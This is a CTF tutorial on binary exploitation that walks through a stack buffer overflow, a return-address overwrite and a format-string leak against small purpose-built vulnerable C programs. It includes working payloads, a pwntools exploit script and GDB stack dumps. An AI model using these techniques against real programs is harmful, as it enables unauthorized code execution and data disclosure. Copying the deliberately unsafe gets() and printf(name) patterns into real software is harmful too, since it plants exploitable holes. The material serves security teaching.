Binary Exploitation

Binary exploitation is one of the core categories in CTF competitions. It involves finding and exploiting vulnerabilities in compiled programs to gain unauthorized access or execute arbitrary code.

Tools You'll Need

  • GDB with extensions: use pwndbg, gdb-peda, or gef for a clearer view of registers, the stack, and disassembly
  • pwntools module: Essential Python library for exploit development

Example 1: Buffer Overflow (bof0)

Given the problem in example1.c:

c
#include <stdio.h>
#include <string.h>

void readFlag() {
    char flag[32];
    FILE *fptr;
    fptr = fopen("flag.txt", "r");
    fread(&flag, sizeof(char), 32, fptr);
    puts(flag);
}

void vuln() {
    char input[8];
    char string[8] = "UwU";
    printf("your input: ");
    gets(input);
    printf("string is: %s\n", string);
    if(strcmp(string, ">w<") == 0) {
        puts("congrats! here's your flag");
        readFlag();
    } else {
        printf("not yet :(\nkeep trying!\n");
    }
}

int main() {
    setbuf(stdout, NULL);
    puts("hi! change the string to >w< and you'll get your flag!");
    vuln();
    return 0;
}

Analysis

Look closely and you will see that vuln calls gets, which takes no buffer size and therefore never checks how much it writes, so we can overflow input.

You can check the manual page of gets function with:

bash
man gets

The manual page says:

gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0'). No check for buffer overrun is performed

Finding the Offset

If we run the binary with ./example1 we will get:

text
hi! change the string to >w< and you'll get your flag!
your input:

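Rather than guessing, generate a cyclic pattern in which every 4-byte chunk is unique, so the bytes that end up in string reveal the offset. With pwntools:

bash
pwn cyclic 16
# Output: aaaabaaacaaadaaa

gef's pattern create command serves the same purpose inside GDB.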

Feeding that pattern to the program gives:

text
hi! change the string to >w< and you'll get your flag!
your input: aaaabaaacaaadaaa
string is: caaadaaa
not yet :(
keep trying!
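
The offset can also be read off programmatically. The following is a minimal sketch, assuming the pattern and the leaked value are copied by hand from the session above; the variable names are illustrative only.

```python
# Pattern sent to the program and the value printed for `string`,
# both copied from the session above.
pattern = b"aaaabaaacaaadaaa"
leaked = b"caaadaaa"

# Every 4-byte chunk of the cyclic pattern is unique, so the position of the
# first leaked chunk is the distance from the start of `input` to `string`.
offset = pattern.index(leaked[:4])
print(offset)  # 8
```

An offset of 8 means the ninth input byte is the first one that lands in string.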

Exploitation

Look at the output carefully: string now holds caaadaaa, the part of the pattern that starts at offset 8, so our input has overwritten string[8]. The input variable is only 8 bytes, and anything gets reads beyond those 8 bytes spills into whatever follows it on the stack, which in this case is string[8].

So the input has to be 8 padding characters followed by >w<. gets appends the terminating null byte itself, so string ends up as exactly ">w<". Let's use A for the padding, which makes the payload:

text
AAAAAAAA>w<

Supply the payload to the binary and we get the flag.
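
To see why this payload works, the overwrite can be modelled in a few lines of Python. This is only a sketch of the idea, not the real process memory: the helper names simulate_gets and read_c_string are made up for illustration, and the layout (input at offset 0, string directly after it at offset 8) is an assumption inferred from the pattern test.

```python
def simulate_gets(frame: bytearray, start: int, data: bytes) -> None:
    """Copy data into frame at start and append a NUL, with no bounds check."""
    end = start + len(data) + 1
    frame[start:end] = data + b"\x00"


def read_c_string(frame: bytearray, start: int) -> bytes:
    """Return the bytes from start up to (not including) the first NUL."""
    return bytes(frame[start:frame.index(0, start)])


# Assumed layout: input[8] at offset 0, string[8] at offset 8.
INPUT_OFF, STRING_OFF = 0, 8

frame = bytearray(16)
frame[STRING_OFF:STRING_OFF + 4] = b"UwU\x00"

# Eight padding bytes fill `input`; the rest spills into `string`.
simulate_gets(frame, INPUT_OFF, b"A" * 8 + b">w<")
result = read_c_string(frame, STRING_OFF)
print(result)  # b'>w<'
```

The NUL written after >w< is what makes strcmp see an exact match.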

Flag: CTF{buffer_overflo0o0o0ow}

Example 2: Return Address Overwrite (b0f1.c)

Given the problem in example2.c:

c
#include <stdio.h>
#include <string.h>

void readFlag() {
    char flag[32];
    FILE *fptr;
    fptr = fopen("flag.txt", "r");
    fread(&flag, sizeof(char), 32, fptr);
    puts(flag);
}

void vuln() {
    char string[8] = "UwU";
    char input[8];
    printf("your input: ");
    gets(input);
    printf("string is: %s\n", string);
    if(strcmp(string, ">w<") == 0) {
        puts("so what?");
    } else {
        printf("not yet :(\nkeep trying!\n");
    }
}

int main() {
    setbuf(stdout, NULL);
    puts("hi! change the string to >w< and we'll see what happens!");
    vuln();
    return 0;
}

Analysis

Look carefully and you will see a readFlag function that reads and prints the flag. But main never calls readFlag; it only calls vuln. So how can we execute readFlag when nothing in the program calls it?

vuln still uses gets, so it is still unsafe. We can exploit that to overwrite the return address of vuln with the address of readFlag, so that execution jumps to readFlag when vuln returns.

Finding Function Addresses

You can use a decompiler or gdb to examine the functions. Here we stick to gdb and other standard tools such as readelf.

bash
readelf -s ./example2

This prints the symbol table, which includes every function. Look for the readFlag entry:

bash
66: 00000000004006d7 75 FUNC GLOBAL DEFAULT 13 readFlag

readFlag address: 0x00000000004006d7

Debugging with GDB

We need to set breakpoints before and after the input is read so we can examine the stack at both points:

bash
gdb ./example2

This starts gdb. Because the input is read in the vuln function, we disassemble vuln:

bash
disas vuln

Let's set breakpoints at 0x000000000040074a and 0x0000000000400754, before and after the input is read:

bash
b*0x000000000040074a
# Breakpoint 1 at 0x40074a
b*0x0000000000400754
# Breakpoint 2 at 0x400754

Type r after setting the breakpoints to start the program.

Stack Analysis

Before input:

bash
stack
0x00007fffffffdac0│+0x0000: 0x00000000004005f0 → <_start+0> xor ebp, ebp ← $rax, $rsp, $rdi
0x00007fffffffdac8│+0x0008: 0x0000000000557755 ("UwU"?)
0x00007fffffffdad0│+0x0010: 0x00007fffffffdae0 → 0x0000000000000000 ← $rbp
0x00007fffffffdad8│+0x0018: 0x00000000004007ce → <main+46> mov eax, 0x0

In the stack view before input, the saved return address of vuln sits at offset +0x0018, just above the saved $rbp. Its value is 0x00000000004007ce, which points back into main (<main+46>). To run readFlag we must replace that value with the address of readFlag.

Finding the Offset

Use cyclic or gef's pattern create to find the offset:

bash
pattern create 24
# Output: aaaabaaacaaadaaaeaaafaaa

After input:

bash
stack
0x00007fffffffdac0│+0x0000: "aaaabaaacaaadaaaeaaafaaa" ← $rax, $rsp, $r8
0x00007fffffffdac8│+0x0008: "caaadaaaeaaafaaa"
0x00007fffffffdad0│+0x0010: "eaaafaaa" ← $rbp
0x00007fffffffdad8│+0x0018: 0x0000000000400700 → <readFlag+41>

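Before input the saved return address was 0x4007ce; now it is 0x400700. The 24 pattern bytes filled input, string, and the saved $rbp, and the null byte that gets appends overwrote the lowest byte of the return address, changing ce to 00. The return address therefore starts 24 bytes after the start of input.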
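
The arithmetic behind these observations can be checked with a short sketch. It assumes the addresses and values are copied by hand from the two stack dumps above (the slot at +0x0018 goes from 0x4007ce to 0x400700); the variable names are illustrative.

```python
import struct

# Values copied from the two stack dumps above.
input_addr = 0x00007fffffffdac0      # start of `input` ($rsp)
ret_slot_addr = 0x00007fffffffdad8   # slot holding the saved return address
saved_ret = 0x00000000004007ce       # <main+46>, before the input

offset = ret_slot_addr - input_addr
print(offset)  # 24

# The 24-byte pattern stops right before the slot; gets() then appends its
# terminating NUL, which lands on the lowest byte of the little-endian address.
slot = bytearray(struct.pack("<Q", saved_ret))
slot[0] = 0x00
clobbered = struct.unpack("<Q", bytes(slot))[0]
print(hex(clobbered))  # 0x400700
```

So 24 bytes of padding reach the return address, and the next 8 bytes replace it.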

Creating the Payload

To convert the address to little-endian form you can use pwntools:

python
>>> import pwn
>>> pwn.p64(0x00000000004006d7)
b'\xd7\x06@\x00\x00\x00\x00\x00'
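
If pwntools is not available, the same bytes can be produced with Python's standard struct module. This is a minimal sketch; the constant name READ_FLAG is illustrative, and the 24-byte padding is the offset found in the stack dumps above.

```python
import struct

READ_FLAG = 0x00000000004006d7  # address taken from the readelf output

# "<Q" means little-endian unsigned 64-bit, the same layout p64 produces.
packed = struct.pack("<Q", READ_FLAG)
print(packed)  # b'\xd7\x06@\x00\x00\x00\x00\x00'

# 24 bytes of padding reach the saved return address, then the new address.
payload = b"A" * 24 + packed
print(len(payload))  # 32
```

The @ in the output is simply byte 0x40 shown as its printable ASCII character.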

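Our payload contains non-printable bytes, so how do we deliver it?

You can either pipe it in from the command line (writing raw bytes, because Python 3's print would re-encode \xd7 as two UTF-8 bytes):

bash
python3 -c "import sys; sys.stdout.buffer.write(b'A'*24 + b'\xd7\x06@\x00\x00\x00\x00\x00\n')" | ./example2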

Or using pwntools:

python
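from pwn import *

# Start the local binary; use remote(host, port) for a hosted challenge
p = process('./example2')

offset = 24                      # bytes from input to the saved return address
readFlag = 0x00000000004006d7    # address from readelf

payload = b'A' * offset
payload += p64(readFlag)         # packed as 8 little-endian bytes

p.sendline(payload)
p.interactive()

This sends the payload and enters interactive mode, where the flag is printed.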

Flag: CTF{ch4ng3_th3_progr4m_fl0o0w}

Example 3: Format String Vulnerability (fstr0)

Given the problem in example3.c:

c
// gcc fstr0.c -o fstr0
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void readFlag(char* flag) {
    FILE *fptr;
    fptr = fopen("flag.txt", "r");
    fread(flag, sizeof(char), 32, fptr);
}

void vuln() {
    char flag[32];
    char name[256];
    readFlag(flag);
    puts("what's your name?");
    fgets(name, 256, stdin);
    printf("hello, ");
    printf(name);
}

int main() {
    setbuf(stdout, NULL);
    puts("hi, welcome to fstring!");
    vuln();
    return 0;
}

Analysis

As we can see, the input is read with fgets, which stores at most 255 characters plus a terminating null byte in the 256-byte name buffer, so a buffer overflow is not possible here. But look more closely at the last line of vuln: printf(name);.

The f in printf stands for formatted: the first argument is a format string that tells printf how to print the arguments that follow.

For example:

c
printf("%d %d %d %d %d", 1, 2, 3, 4, 5); // will output: 1 2 3 4 5

We can also choose which argument a specifier refers to with the %n$ syntax, where n is the 1-based position of the argument. For example:

c
printf("%2$d %1$d %3$d %5$d %4$d", 1, 2, 3, 4, 5); // will output : 2 1 3 5 4

Format String Exploitation

See the difference? So how can we exploit a format string? When a program passes our input directly as the format string, as printf(name) does, any format specifiers we type are interpreted by printf. Wait, what? How?

Because printf(name) supplies no arguments after the format string, a specifier such as %x has no matching value. printf does not know that; it simply reads the next argument slot, whatever it happens to contain. On x86-64 Linux the first five slots after the format string are registers and every later slot is taken from the stack. If we enter %x %x %x %x %x, printf prints five values that the program never intended to pass.

If we run the binary and enter %p %p %p %p %p when it asks for input:

text
hi, welcome to fstring!
what's your name?
%p %p %p %p %p
hello, 0x7ffc01c289e0 0x7fdebadae8c0 (nil) 0x7 (nil)

As you can see, it prints whatever values happen to be in those slots. vuln calls readFlag(flag) with flag as a local buffer, so the flag must be on vuln's stack; we just need to find where it is. We can use %p, %lx, or even %ld; plain %x prints only the low 4 bytes of each value:

text
hi, welcome to fstring!
what's your name?
%p %p %p %p %p %p %p %p %p %p
hello, 0x7fff91459780 0x7fb7ed9758c0 (nil) 0x7 (nil) 0x5f6573757b465443 0x635f66746e697270 0x796c6c7566657261 0x7f7d7a6c705f 0x7025207025207025

Run the program once more:

text
hi, welcome to fstring!
what's your name?
%p %p %p %p %p %p %p %p %p %p
hello, 0x7ffc069220b0 0x7f9093e858c0 (nil) 0x7 (nil) 0x5f6573757b465443 0x635f66746e697270 0x796c6c7566657261 0x7f7d7a6c705f 0x7025207025207025
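
Comparing the two runs slot by slot makes it easy to separate values that are randomized on every run from values that are plain data. The sketch below assumes the two leak lines are copied by hand from the outputs above, without the "hello, " prefix; the variable names are illustrative.

```python
run1 = ("0x7fff91459780 0x7fb7ed9758c0 (nil) 0x7 (nil) 0x5f6573757b465443 "
        "0x635f66746e697270 0x796c6c7566657261 0x7f7d7a6c705f 0x7025207025207025")
run2 = ("0x7ffc069220b0 0x7f9093e858c0 (nil) 0x7 (nil) 0x5f6573757b465443 "
        "0x635f66746e697270 0x796c6c7566657261 0x7f7d7a6c705f 0x7025207025207025")

pairs = list(zip(run1.split(), run2.split()))

# 1-based positions, matching the order of the %p specifiers.
changed = [i for i, (a, b) in enumerate(pairs, start=1) if a != b]
stable = [i for i, (a, b) in enumerate(pairs, start=1)
          if a == b and a != "(nil)"]
print(changed)  # [1, 2]
print(stable)   # [4, 6, 7, 8, 9, 10]
```

Slot 10 (0x7025207025207025) is the start of our own input: read in memory order, its bytes spell "%p %p %p".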

ASLR and PIE

As you can see, the first two values differ between runs. This happens because ASLR (Address Space Layout Randomization) is active: the stack and shared libraries are loaded at different addresses on every run. We can also use checksec to see which protections the binary itself was built with:

bash
checksec example3
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

PIE (Position Independent Executable) complements ASLR: it lets the program's own code and data be loaded at a random base as well, so function addresses change on every run. But as you can see, the values from the 6th onward are identical in both runs, so they are data rather than addresses. Maybe this is the flag?
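
Once the interesting slots are known, the %n$ syntax shown earlier can request them directly instead of printing everything before them. A minimal sketch, assuming the flag occupies argument slots 6 through 9 as the repeated values suggest; the slot range is specific to this binary and would need adjusting elsewhere.

```python
# Assumption: the flag occupies printf arguments 6 through 9, as the repeated
# values in the two runs suggest. Adjust the range for a different binary.
FIRST_SLOT, LAST_SLOT = 6, 9

# %N$p prints the N-th argument as a pointer-sized hex value.
payload = " ".join(f"%{n}$p" for n in range(FIRST_SLOT, LAST_SLOT + 1))
print(payload)  # %6$p %7$p %8$p %9$p
```

Entering this string as the name should print only the four candidate values.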

Extracting the Flag

Convert these values to ASCII:

  • 0x5f6573757b465443
  • 0x635f66746e697270
  • 0x796c6c7566657261
  • 0x7f7d7a6c705f

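Converting each value to ASCII with Python gives _esu{FTCc_ftnirpyllufera}zlp_ - it looks like the flag, but with every 8-byte group reversed!

Remember that our machine is little-endian, so the bytes of each 8-byte value are stored in memory in the opposite order from how the number is printed. We must reverse the bytes within each value to get the correct flag: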

python
from pwn import p64

flag = "0x5f6573757b465443-0x635f66746e697270-0x796c6c7566657261-0x7f7d7a6c705f"
arrflag = flag.split("-")

ans = b''
for item in arrflag:
    # p64 packs each value as 8 little-endian bytes, restoring memory order
    ans += p64(int(item, 16))
print(ans.decode())

And we get our desired flag.
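
The same decoding also works with the standard library alone, starting from the raw output line. This is a sketch under the assumption that slots 6 to 9 hold the flag and that the flag ends at the first closing brace; the variable names are illustrative.

```python
# Output line copied from the run above; slots 6 to 9 hold the flag bytes.
line = ("hello, 0x7fff91459780 0x7fb7ed9758c0 (nil) 0x7 (nil) 0x5f6573757b465443 "
        "0x635f66746e697270 0x796c6c7566657261 0x7f7d7a6c705f 0x7025207025207025")

words = line.split()[1:]   # drop the "hello," prefix
flag_words = words[5:9]    # 1-based slots 6..9

# to_bytes(8, "little") is the standard-library equivalent of p64.
raw = b"".join(int(w, 16).to_bytes(8, "little") for w in flag_words)

# Keep the text up to and including the closing brace; what follows is
# leftover stack data, not part of the flag.
flag = raw[:raw.index(b"}") + 1].decode()
print(flag)  # CTF{use_printf_carefully_plz}
```

Cutting at the closing brace drops the trailing 0x7f byte and padding that the last value carries.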

Flag: CTF{use_printf_carefully_plz}